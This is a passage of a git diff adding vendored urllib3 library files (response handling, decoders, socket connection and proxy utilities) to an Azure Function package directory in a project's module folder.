urlopen_kw: + raise TypeError( + "request got values for both 'fields' and 'body', can only specify one." + ) + + if encode_multipart: + body, content_type = encode_multipart_formdata( + fields, boundary=multipart_boundary + ) + else: + body, content_type = ( + urlencode(fields), + "application/x-www-form-urlencoded", + ) + + extra_kw["body"] = body + extra_kw["headers"] = {"Content-Type": content_type} + + extra_kw["headers"].update(headers) + extra_kw.update(urlopen_kw) + + return self.urlopen(method, url, **extra_kw) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/response.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/response.py new file mode 100644 index 0000000..9018d6f --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/response.py @@ -0,0 +1,824 @@ +from __future__ import absolute_import + +import io +import logging +import zlib +from contextlib import contextmanager +from socket import error as SocketError +from socket import timeout as SocketTimeout + +try: + try: + import brotlicffi as brotli + except ImportError: + import brotli +except ImportError: + brotli = None + +from ._collections import HTTPHeaderDict +from .connection import BaseSSLError, HTTPException +from .exceptions import ( + BodyNotHttplibCompatible, + DecodeError, + HTTPError, + IncompleteRead, + InvalidChunkLength, + InvalidHeader, + ProtocolError, + ReadTimeoutError, + ResponseNotChunked, + SSLError, +) +from .packages import six +from .util.response import is_fp_closed, is_response_to_head + +log = logging.getLogger(__name__) + + +class DeflateDecoder(object): + def __init__(self): + self._first_try = True + self._data = b"" + self._obj = zlib.decompressobj() + + def __getattr__(self, name): + return getattr(self._obj, name) + + def decompress(self, data): + if not data: + return data + + if not self._first_try: + return self._obj.decompress(data) + + self._data += data + try: + decompressed = self._obj.decompress(data) + if decompressed: + self._first_try = False + self._data = None + return decompressed + except zlib.error: + self._first_try = False + self._obj = zlib.decompressobj(-zlib.MAX_WBITS) + try: + return self.decompress(self._data) + finally: + self._data = None + + +class GzipDecoderState(object): + + FIRST_MEMBER = 0 + OTHER_MEMBERS = 1 + SWALLOW_DATA = 2 + + +class GzipDecoder(object): + def __init__(self): + self._obj = zlib.decompressobj(16 + zlib.MAX_WBITS) + self._state = GzipDecoderState.FIRST_MEMBER + + def __getattr__(self, name): + return getattr(self._obj, name) + + def decompress(self, data): + ret = bytearray() + if self._state == GzipDecoderState.SWALLOW_DATA or not data: + return bytes(ret) + while True: + try: + ret += self._obj.decompress(data) + except zlib.error: + previous_state = self._state + # Ignore data after the first error + self._state = GzipDecoderState.SWALLOW_DATA + if previous_state == GzipDecoderState.OTHER_MEMBERS: + # Allow trailing garbage acceptable in other gzip clients + return bytes(ret) + raise + data = self._obj.unused_data + if not data: + return bytes(ret) + self._state = GzipDecoderState.OTHER_MEMBERS + self._obj = zlib.decompressobj(16 + zlib.MAX_WBITS) + + +if brotli is not None: + + class BrotliDecoder(object): + # Supports both 'brotlipy' and 'Brotli' packages + # since they share an import name. The top branches + # are for 'brotlipy' and bottom branches for 'Brotli' + def __init__(self): + self._obj = brotli.Decompressor() + if hasattr(self._obj, "decompress"): + self.decompress = self._obj.decompress + else: + self.decompress = self._obj.process + + def flush(self): + if hasattr(self._obj, "flush"): + return self._obj.flush() + return b"" + + +class MultiDecoder(object): + """ + From RFC7231: + If one or more encodings have been applied to a representation, the + sender that applied the encodings MUST generate a Content-Encoding + header field that lists the content codings in the order in which + they were applied. + """ + + def __init__(self, modes): + self._decoders = [_get_decoder(m.strip()) for m in modes.split(",")] + + def flush(self): + return self._decoders[0].flush() + + def decompress(self, data): + for d in reversed(self._decoders): + data = d.decompress(data) + return data + + +def _get_decoder(mode): + if "," in mode: + return MultiDecoder(mode) + + if mode == "gzip": + return GzipDecoder() + + if brotli is not None and mode == "br": + return BrotliDecoder() + + return DeflateDecoder() + + +class HTTPResponse(io.IOBase): + """ + HTTP Response container. + + Backwards-compatible with :class:`http.client.HTTPResponse` but the response ``body`` is + loaded and decoded on-demand when the ``data`` property is accessed. This + class is also compatible with the Python standard library's :mod:`io` + module, and can hence be treated as a readable object in the context of that + framework. + + Extra parameters for behaviour not present in :class:`http.client.HTTPResponse`: + + :param preload_content: + If True, the response's body will be preloaded during construction. + + :param decode_content: + If True, will attempt to decode the body based on the + 'content-encoding' header. + + :param original_response: + When this HTTPResponse wrapper is generated from an :class:`http.client.HTTPResponse` + object, it's convenient to include the original for debug purposes. It's + otherwise unused. + + :param retries: + The retries contains the last :class:`~urllib3.util.retry.Retry` that + was used during the request. + + :param enforce_content_length: + Enforce content length checking. Body returned by server must match + value of Content-Length header, if present. Otherwise, raise error. + """ + + CONTENT_DECODERS = ["gzip", "deflate"] + if brotli is not None: + CONTENT_DECODERS += ["br"] + REDIRECT_STATUSES = [301, 302, 303, 307, 308] + + def __init__( + self, + body="", + headers=None, + status=0, + version=0, + reason=None, + strict=0, + preload_content=True, + decode_content=True, + original_response=None, + pool=None, + connection=None, + msg=None, + retries=None, + enforce_content_length=False, + request_method=None, + request_url=None, + auto_close=True, + ): + + if isinstance(headers, HTTPHeaderDict): + self.headers = headers + else: + self.headers = HTTPHeaderDict(headers) + self.status = status + self.version = version + self.reason = reason + self.strict = strict + self.decode_content = decode_content + self.retries = retries + self.enforce_content_length = enforce_content_length + self.auto_close = auto_close + + self._decoder = None + self._body = None + self._fp = None + self._original_response = original_response + self._fp_bytes_read = 0 + self.msg = msg + self._request_url = request_url + + if body and isinstance(body, (six.string_types, bytes)): + self._body = body + + self._pool = pool + self._connection = connection + + if hasattr(body, "read"): + self._fp = body + + # Are we using the chunked-style of transfer encoding? + self.chunked = False + self.chunk_left = None + tr_enc = self.headers.get("transfer-encoding", "").lower() + # Don't incur the penalty of creating a list and then discarding it + encodings = (enc.strip() for enc in tr_enc.split(",")) + if "chunked" in encodings: + self.chunked = True + + # Determine length of response + self.length_remaining = self._init_length(request_method) + + # If requested, preload the body. + if preload_content and not self._body: + self._body = self.read(decode_content=decode_content) + + def get_redirect_location(self): + """ + Should we redirect and where to? + + :returns: Truthy redirect location string if we got a redirect status + code and valid location. ``None`` if redirect status and no + location. ``False`` if not a redirect status code. + """ + if self.status in self.REDIRECT_STATUSES: + return self.headers.get("location") + + return False + + def release_conn(self): + if not self._pool or not self._connection: + return + + self._pool._put_conn(self._connection) + self._connection = None + + def drain_conn(self): + """ + Read and discard any remaining HTTP response data in the response connection. + + Unread data in the HTTPResponse connection blocks the connection from being released back to the pool. + """ + try: + self.read() + except (HTTPError, SocketError, BaseSSLError, HTTPException): + pass + + @property + def data(self): + # For backwards-compat with earlier urllib3 0.4 and earlier. + if self._body: + return self._body + + if self._fp: + return self.read(cache_content=True) + + @property + def connection(self): + return self._connection + + def isclosed(self): + return is_fp_closed(self._fp) + + def tell(self): + """ + Obtain the number of bytes pulled over the wire so far. May differ from + the amount of content returned by :meth:``urllib3.response.HTTPResponse.read`` + if bytes are encoded on the wire (e.g, compressed). + """ + return self._fp_bytes_read + + def _init_length(self, request_method): + """ + Set initial length value for Response content if available. + """ + length = self.headers.get("content-length") + + if length is not None: + if self.chunked: + # This Response will fail with an IncompleteRead if it can't be + # received as chunked. This method falls back to attempt reading + # the response before raising an exception. + log.warning( + "Received response with both Content-Length and " + "Transfer-Encoding set. This is expressly forbidden " + "by RFC 7230 sec 3.3.2. Ignoring Content-Length and " + "attempting to process response as Transfer-Encoding: " + "chunked." + ) + return None + + try: + # RFC 7230 section 3.3.2 specifies multiple content lengths can + # be sent in a single Content-Length header + # (e.g. Content-Length: 42, 42). This line ensures the values + # are all valid ints and that as long as the `set` length is 1, + # all values are the same. Otherwise, the header is invalid. + lengths = set([int(val) for val in length.split(",")]) + if len(lengths) > 1: + raise InvalidHeader( + "Content-Length contained multiple " + "unmatching values (%s)" % length + ) + length = lengths.pop() + except ValueError: + length = None + else: + if length < 0: + length = None + + # Convert status to int for comparison + # In some cases, httplib returns a status of "_UNKNOWN" + try: + status = int(self.status) + except ValueError: + status = 0 + + # Check for responses that shouldn't include a body + if status in (204, 304) or 100 <= status < 200 or request_method == "HEAD": + length = 0 + + return length + + def _init_decoder(self): + """ + Set-up the _decoder attribute if necessary. + """ + # Note: content-encoding value should be case-insensitive, per RFC 7230 + # Section 3.2 + content_encoding = self.headers.get("content-encoding", "").lower() + if self._decoder is None: + if content_encoding in self.CONTENT_DECODERS: + self._decoder = _get_decoder(content_encoding) + elif "," in content_encoding: + encodings = [ + e.strip() + for e in content_encoding.split(",") + if e.strip() in self.CONTENT_DECODERS + ] + if len(encodings): + self._decoder = _get_decoder(content_encoding) + + DECODER_ERROR_CLASSES = (IOError, zlib.error) + if brotli is not None: + DECODER_ERROR_CLASSES += (brotli.error,) + + def _decode(self, data, decode_content, flush_decoder): + """ + Decode the data passed in and potentially flush the decoder. + """ + if not decode_content: + return data + + try: + if self._decoder: + data = self._decoder.decompress(data) + except self.DECODER_ERROR_CLASSES as e: + content_encoding = self.headers.get("content-encoding", "").lower() + raise DecodeError( + "Received response with content-encoding: %s, but " + "failed to decode it." % content_encoding, + e, + ) + if flush_decoder: + data += self._flush_decoder() + + return data + + def _flush_decoder(self): + """ + Flushes the decoder. Should only be called if the decoder is actually + being used. + """ + if self._decoder: + buf = self._decoder.decompress(b"") + return buf + self._decoder.flush() + + return b"" + + @contextmanager + def _error_catcher(self): + """ + Catch low-level python exceptions, instead re-raising urllib3 + variants, so that low-level exceptions are not leaked in the + high-level api. + + On exit, release the connection back to the pool. + """ + clean_exit = False + + try: + try: + yield + + except SocketTimeout: + # FIXME: Ideally we'd like to include the url in the ReadTimeoutError but + # there is yet no clean way to get at it from this context. + raise ReadTimeoutError(self._pool, None, "Read timed out.") + + except BaseSSLError as e: + # FIXME: Is there a better way to differentiate between SSLErrors? + if "read operation timed out" not in str(e): + # SSL errors related to framing/MAC get wrapped and reraised here + raise SSLError(e) + + raise ReadTimeoutError(self._pool, None, "Read timed out.") + + except (HTTPException, SocketError) as e: + # This includes IncompleteRead. + raise ProtocolError("Connection broken: %r" % e, e) + + # If no exception is thrown, we should avoid cleaning up + # unnecessarily. + clean_exit = True + finally: + # If we didn't terminate cleanly, we need to throw away our + # connection. + if not clean_exit: + # The response may not be closed but we're not going to use it + # anymore so close it now to ensure that the connection is + # released back to the pool. + if self._original_response: + self._original_response.close() + + # Closing the response may not actually be sufficient to close + # everything, so if we have a hold of the connection close that + # too. + if self._connection: + self._connection.close() + + # If we hold the original response but it's closed now, we should + # return the connection back to the pool. + if self._original_response and self._original_response.isclosed(): + self.release_conn() + + def read(self, amt=None, decode_content=None, cache_content=False): + """ + Similar to :meth:`http.client.HTTPResponse.read`, but with two additional + parameters: ``decode_content`` and ``cache_content``. + + :param amt: + How much of the content to read. If specified, caching is skipped + because it doesn't make sense to cache partial content as the full + response. + + :param decode_content: + If True, will attempt to decode the body based on the + 'content-encoding' header. + + :param cache_content: + If True, will save the returned data such that the same result is + returned despite of the state of the underlying file object. This + is useful if you want the ``.data`` property to continue working + after having ``.read()`` the file object. (Overridden if ``amt`` is + set.) + """ + self._init_decoder() + if decode_content is None: + decode_content = self.decode_content + + if self._fp is None: + return + + flush_decoder = False + fp_closed = getattr(self._fp, "closed", False) + + with self._error_catcher(): + if amt is None: + # cStringIO doesn't like amt=None + data = self._fp.read() if not fp_closed else b"" + flush_decoder = True + else: + cache_content = False + data = self._fp.read(amt) if not fp_closed else b"" + if ( + amt != 0 and not data + ): # Platform-specific: Buggy versions of Python. + # Close the connection when no data is returned + # + # This is redundant to what httplib/http.client _should_ + # already do. However, versions of python released before + # December 15, 2012 (http://bugs.python.org/issue16298) do + # not properly close the connection in all cases. There is + # no harm in redundantly calling close. + self._fp.close() + flush_decoder = True + if self.enforce_content_length and self.length_remaining not in ( + 0, + None, + ): + # This is an edge case that httplib failed to cover due + # to concerns of backward compatibility. We're + # addressing it here to make sure IncompleteRead is + # raised during streaming, so all calls with incorrect + # Content-Length are caught. + raise IncompleteRead(self._fp_bytes_read, self.length_remaining) + + if data: + self._fp_bytes_read += len(data) + if self.length_remaining is not None: + self.length_remaining -= len(data) + + data = self._decode(data, decode_content, flush_decoder) + + if cache_content: + self._body = data + + return data + + def stream(self, amt=2 ** 16, decode_content=None): + """ + A generator wrapper for the read() method. A call will block until + ``amt`` bytes have been read from the connection or until the + connection is closed. + + :param amt: + How much of the content to read. The generator will return up to + much data per iteration, but may return less. This is particularly + likely when using compressed data. However, the empty string will + never be returned. + + :param decode_content: + If True, will attempt to decode the body based on the + 'content-encoding' header. + """ + if self.chunked and self.supports_chunked_reads(): + for line in self.read_chunked(amt, decode_content=decode_content): + yield line + else: + while not is_fp_closed(self._fp): + data = self.read(amt=amt, decode_content=decode_content) + + if data: + yield data + + @classmethod + def from_httplib(ResponseCls, r, **response_kw): + """ + Given an :class:`http.client.HTTPResponse` instance ``r``, return a + corresponding :class:`urllib3.response.HTTPResponse` object. + + Remaining parameters are passed to the HTTPResponse constructor, along + with ``original_response=r``. + """ + headers = r.msg + + if not isinstance(headers, HTTPHeaderDict): + if six.PY2: + # Python 2.7 + headers = HTTPHeaderDict.from_httplib(headers) + else: + headers = HTTPHeaderDict(headers.items()) + + # HTTPResponse objects in Python 3 don't have a .strict attribute + strict = getattr(r, "strict", 0) + resp = ResponseCls( + body=r, + headers=headers, + status=r.status, + version=r.version, + reason=r.reason, + strict=strict, + original_response=r, + **response_kw + ) + return resp + + # Backwards-compatibility methods for http.client.HTTPResponse + def getheaders(self): + return self.headers + + def getheader(self, name, default=None): + return self.headers.get(name, default) + + # Backwards compatibility for http.cookiejar + def info(self): + return self.headers + + # Overrides from io.IOBase + def close(self): + if not self.closed: + self._fp.close() + + if self._connection: + self._connection.close() + + if not self.auto_close: + io.IOBase.close(self) + + @property + def closed(self): + if not self.auto_close: + return io.IOBase.closed.__get__(self) + elif self._fp is None: + return True + elif hasattr(self._fp, "isclosed"): + return self._fp.isclosed() + elif hasattr(self._fp, "closed"): + return self._fp.closed + else: + return True + + def fileno(self): + if self._fp is None: + raise IOError("HTTPResponse has no file to get a fileno from") + elif hasattr(self._fp, "fileno"): + return self._fp.fileno() + else: + raise IOError( + "The file-like object this HTTPResponse is wrapped " + "around has no file descriptor" + ) + + def flush(self): + if ( + self._fp is not None + and hasattr(self._fp, "flush") + and not getattr(self._fp, "closed", False) + ): + return self._fp.flush() + + def readable(self): + # This method is required for `io` module compatibility. + return True + + def readinto(self, b): + # This method is required for `io` module compatibility. + temp = self.read(len(b)) + if len(temp) == 0: + return 0 + else: + b[: len(temp)] = temp + return len(temp) + + def supports_chunked_reads(self): + """ + Checks if the underlying file-like object looks like a + :class:`http.client.HTTPResponse` object. We do this by testing for + the fp attribute. If it is present we assume it returns raw chunks as + processed by read_chunked(). + """ + return hasattr(self._fp, "fp") + + def _update_chunk_length(self): + # First, we'll figure out length of a chunk and then + # we'll try to read it from socket. + if self.chunk_left is not None: + return + line = self._fp.fp.readline() + line = line.split(b";", 1)[0] + try: + self.chunk_left = int(line, 16) + except ValueError: + # Invalid chunked protocol response, abort. + self.close() + raise InvalidChunkLength(self, line) + + def _handle_chunk(self, amt): + returned_chunk = None + if amt is None: + chunk = self._fp._safe_read(self.chunk_left) + returned_chunk = chunk + self._fp._safe_read(2) # Toss the CRLF at the end of the chunk. + self.chunk_left = None + elif amt < self.chunk_left: + value = self._fp._safe_read(amt) + self.chunk_left = self.chunk_left - amt + returned_chunk = value + elif amt == self.chunk_left: + value = self._fp._safe_read(amt) + self._fp._safe_read(2) # Toss the CRLF at the end of the chunk. + self.chunk_left = None + returned_chunk = value + else: # amt > self.chunk_left + returned_chunk = self._fp._safe_read(self.chunk_left) + self._fp._safe_read(2) # Toss the CRLF at the end of the chunk. + self.chunk_left = None + return returned_chunk + + def read_chunked(self, amt=None, decode_content=None): + """ + Similar to :meth:`HTTPResponse.read`, but with an additional + parameter: ``decode_content``. + + :param amt: + How much of the content to read. If specified, caching is skipped + because it doesn't make sense to cache partial content as the full + response. + + :param decode_content: + If True, will attempt to decode the body based on the + 'content-encoding' header. + """ + self._init_decoder() + # FIXME: Rewrite this method and make it a class with a better structured logic. + if not self.chunked: + raise ResponseNotChunked( + "Response is not chunked. " + "Header 'transfer-encoding: chunked' is missing." + ) + if not self.supports_chunked_reads(): + raise BodyNotHttplibCompatible( + "Body should be http.client.HTTPResponse like. " + "It should have have an fp attribute which returns raw chunks." + ) + + with self._error_catcher(): + # Don't bother reading the body of a HEAD request. + if self._original_response and is_response_to_head(self._original_response): + self._original_response.close() + return + + # If a response is already read and closed + # then return immediately. + if self._fp.fp is None: + return + + while True: + self._update_chunk_length() + if self.chunk_left == 0: + break + chunk = self._handle_chunk(amt) + decoded = self._decode( + chunk, decode_content=decode_content, flush_decoder=False + ) + if decoded: + yield decoded + + if decode_content: + # On CPython and PyPy, we should never need to flush the + # decoder. However, on Jython we *might* need to, so + # lets defensively do it anyway. + decoded = self._flush_decoder() + if decoded: # Platform-specific: Jython. + yield decoded + + # Chunk content ends with \r\n: discard it. + while True: + line = self._fp.fp.readline() + if not line: + # Some sites may not end with '\r\n'. + break + if line == b"\r\n": + break + + # We read everything; close the "file". + if self._original_response: + self._original_response.close() + + def geturl(self): + """ + Returns the URL that was the source of this response. + If the request that generated this response redirected, this method + will return the final redirect location. + """ + if self.retries is not None and len(self.retries.history): + return self.retries.history[-1].redirect_location + else: + return self._request_url + + def __iter__(self): + buffer = [] + for chunk in self.stream(decode_content=True): + if b"\n" in chunk: + chunk = chunk.split(b"\n") + yield b"".join(buffer) + chunk[0] + b"\n" + for x in chunk[1:-1]: + yield x + b"\n" + if chunk[-1]: + buffer = [chunk[-1]] + else: + buffer = [] + else: + buffer.append(chunk) + if buffer: + yield b"".join(buffer) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__init__.py new file mode 100644 index 0000000..5037745 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__init__.py @@ -0,0 +1,49 @@ +from __future__ import absolute_import + +# For backwards compatibility, provide imports that used to be here. +from .connection import is_connection_dropped +from .request import SKIP_HEADER, SKIPPABLE_HEADERS, make_headers +from .response import is_fp_closed +from .retry import Retry +from .ssl_ import ( + ALPN_PROTOCOLS, + HAS_SNI, + IS_PYOPENSSL, + IS_SECURETRANSPORT, + PROTOCOL_TLS, + SSLContext, + assert_fingerprint, + resolve_cert_reqs, + resolve_ssl_version, + ssl_wrap_socket, +) +from .timeout import Timeout, current_time +from .url import Url, get_host, parse_url, split_first +from .wait import wait_for_read, wait_for_write + +__all__ = ( + "HAS_SNI", + "IS_PYOPENSSL", + "IS_SECURETRANSPORT", + "SSLContext", + "PROTOCOL_TLS", + "ALPN_PROTOCOLS", + "Retry", + "Timeout", + "Url", + "assert_fingerprint", + "current_time", + "is_connection_dropped", + "is_fp_closed", + "get_host", + "parse_url", + "make_headers", + "resolve_cert_reqs", + "resolve_ssl_version", + "split_first", + "ssl_wrap_socket", + "wait_for_read", + "wait_for_write", + "SKIP_HEADER", + "SKIPPABLE_HEADERS", +) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..3711f01 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/connection.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/connection.cpython-39.pyc new file mode 100644 index 0000000..820ab10 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/connection.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/proxy.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/proxy.cpython-39.pyc new file mode 100644 index 0000000..219257e Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/proxy.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/queue.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/queue.cpython-39.pyc new file mode 100644 index 0000000..23cc189 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/queue.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/request.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/request.cpython-39.pyc new file mode 100644 index 0000000..f636daa Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/request.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/response.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/response.cpython-39.pyc new file mode 100644 index 0000000..dd62c94 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/response.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/retry.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/retry.cpython-39.pyc new file mode 100644 index 0000000..031f67c Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/retry.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/ssl_.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/ssl_.cpython-39.pyc new file mode 100644 index 0000000..c47330d Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/ssl_.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/ssl_match_hostname.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/ssl_match_hostname.cpython-39.pyc new file mode 100644 index 0000000..917d51d Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/ssl_match_hostname.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/ssltransport.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/ssltransport.cpython-39.pyc new file mode 100644 index 0000000..4e21e16 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/ssltransport.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/timeout.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/timeout.cpython-39.pyc new file mode 100644 index 0000000..cacf90e Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/timeout.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/url.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/url.cpython-39.pyc new file mode 100644 index 0000000..9cdfcb8 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/url.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/wait.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/wait.cpython-39.pyc new file mode 100644 index 0000000..5142e97 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/wait.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/connection.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/connection.py new file mode 100644 index 0000000..64cd463 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/connection.py @@ -0,0 +1,149 @@ +from __future__ import absolute_import + +import socket + +from ..contrib import _appengine_environ +from ..exceptions import LocationParseError +from ..packages import six +from .wait import NoWayToWaitForSocketError, wait_for_read + + +def is_connection_dropped(conn): # Platform-specific + """ + Returns True if the connection is dropped and should be closed. + + :param conn: + :class:`http.client.HTTPConnection` object. + + Note: For platforms like AppEngine, this will always return ``False`` to + let the platform handle connection recycling transparently for us. + """ + sock = getattr(conn, "sock", False) + if sock is False: # Platform-specific: AppEngine + return False + if sock is None: # Connection already closed (such as by httplib). + return True + try: + # Returns True if readable, which here means it's been dropped + return wait_for_read(sock, timeout=0.0) + except NoWayToWaitForSocketError: # Platform-specific: AppEngine + return False + + +# This function is copied from socket.py in the Python 2.7 standard +# library test suite. Added to its signature is only `socket_options`. +# One additional modification is that we avoid binding to IPv6 servers +# discovered in DNS if the system doesn't have IPv6 functionality. +def create_connection( + address, + timeout=socket._GLOBAL_DEFAULT_TIMEOUT, + source_address=None, + socket_options=None, +): + """Connect to *address* and return the socket object. + + Convenience function. Connect to *address* (a 2-tuple ``(host, + port)``) and return the socket object. Passing the optional + *timeout* parameter will set the timeout on the socket instance + before attempting to connect. If no *timeout* is supplied, the + global default timeout setting returned by :func:`socket.getdefaulttimeout` + is used. If *source_address* is set it must be a tuple of (host, port) + for the socket to bind as a source address before making the connection. + An host of '' or port 0 tells the OS to use the default. + """ + + host, port = address + if host.startswith("["): + host = host.strip("[]") + err = None + + # Using the value from allowed_gai_family() in the context of getaddrinfo lets + # us select whether to work with IPv4 DNS records, IPv6 records, or both. + # The original create_connection function always returns all records. + family = allowed_gai_family() + + try: + host.encode("idna") + except UnicodeError: + return six.raise_from( + LocationParseError(u"'%s', label empty or too long" % host), None + ) + + for res in socket.getaddrinfo(host, port, family, socket.SOCK_STREAM): + af, socktype, proto, canonname, sa = res + sock = None + try: + sock = socket.socket(af, socktype, proto) + + # If provided, set socket level options before connecting. + _set_socket_options(sock, socket_options) + + if timeout is not socket._GLOBAL_DEFAULT_TIMEOUT: + sock.settimeout(timeout) + if source_address: + sock.bind(source_address) + sock.connect(sa) + return sock + + except socket.error as e: + err = e + if sock is not None: + sock.close() + sock = None + + if err is not None: + raise err + + raise socket.error("getaddrinfo returns an empty list") + + +def _set_socket_options(sock, options): + if options is None: + return + + for opt in options: + sock.setsockopt(*opt) + + +def allowed_gai_family(): + """This function is designed to work in the context of + getaddrinfo, where family=socket.AF_UNSPEC is the default and + will perform a DNS search for both IPv6 and IPv4 records.""" + + family = socket.AF_INET + if HAS_IPV6: + family = socket.AF_UNSPEC + return family + + +def _has_ipv6(host): + """Returns True if the system can bind an IPv6 address.""" + sock = None + has_ipv6 = False + + # App Engine doesn't support IPV6 sockets and actually has a quota on the + # number of sockets that can be used, so just early out here instead of + # creating a socket needlessly. + # See https://github.com/urllib3/urllib3/issues/1446 + if _appengine_environ.is_appengine_sandbox(): + return False + + if socket.has_ipv6: + # has_ipv6 returns true if cPython was compiled with IPv6 support. + # It does not tell us if the system has IPv6 support enabled. To + # determine that we must bind to an IPv6 address. + # https://github.com/urllib3/urllib3/pull/611 + # https://bugs.python.org/issue658327 + try: + sock = socket.socket(socket.AF_INET6) + sock.bind((host, 0)) + has_ipv6 = True + except Exception: + pass + + if sock: + sock.close() + return has_ipv6 + + +HAS_IPV6 = _has_ipv6("::1") diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/proxy.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/proxy.py new file mode 100644 index 0000000..fbe47e7 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/proxy.py @@ -0,0 +1,57 @@ +from .ssl_ import create_urllib3_context, resolve_cert_reqs, resolve_ssl_version + + +def connection_requires_http_tunnel( + proxy_url=None, proxy_config=None, destination_scheme=None +): + """ + Returns True if the connection requires an HTTP CONNECT through the proxy. + + :param URL proxy_url: + URL of the proxy. + :param ProxyConfig proxy_config: + Proxy configuration from poolmanager.py + :param str destination_scheme: + The scheme of the destination. (i.e https, http, etc) + """ + # If we're not using a proxy, no way to use a tunnel. + if proxy_url is None: + return False + + # HTTP destinations never require tunneling, we always forward. + if destination_scheme == "http": + return False + + # Support for forwarding with HTTPS proxies and HTTPS destinations. + if ( + proxy_url.scheme == "https" + and proxy_config + and proxy_config.use_forwarding_for_https + ): + return False + + # Otherwise always use a tunnel. + return True + + +def create_proxy_ssl_context( + ssl_version, cert_reqs, ca_certs=None, ca_cert_dir=None, ca_cert_data=None +): + """ + Generates a default proxy ssl context if one hasn't been provided by the + user. + """ + ssl_context = create_urllib3_context( + ssl_version=resolve_ssl_version(ssl_version), + cert_reqs=resolve_cert_reqs(cert_reqs), + ) + + if ( + not ca_certs + and not ca_cert_dir + and not ca_cert_data + and hasattr(ssl_context, "load_default_certs") + ): + 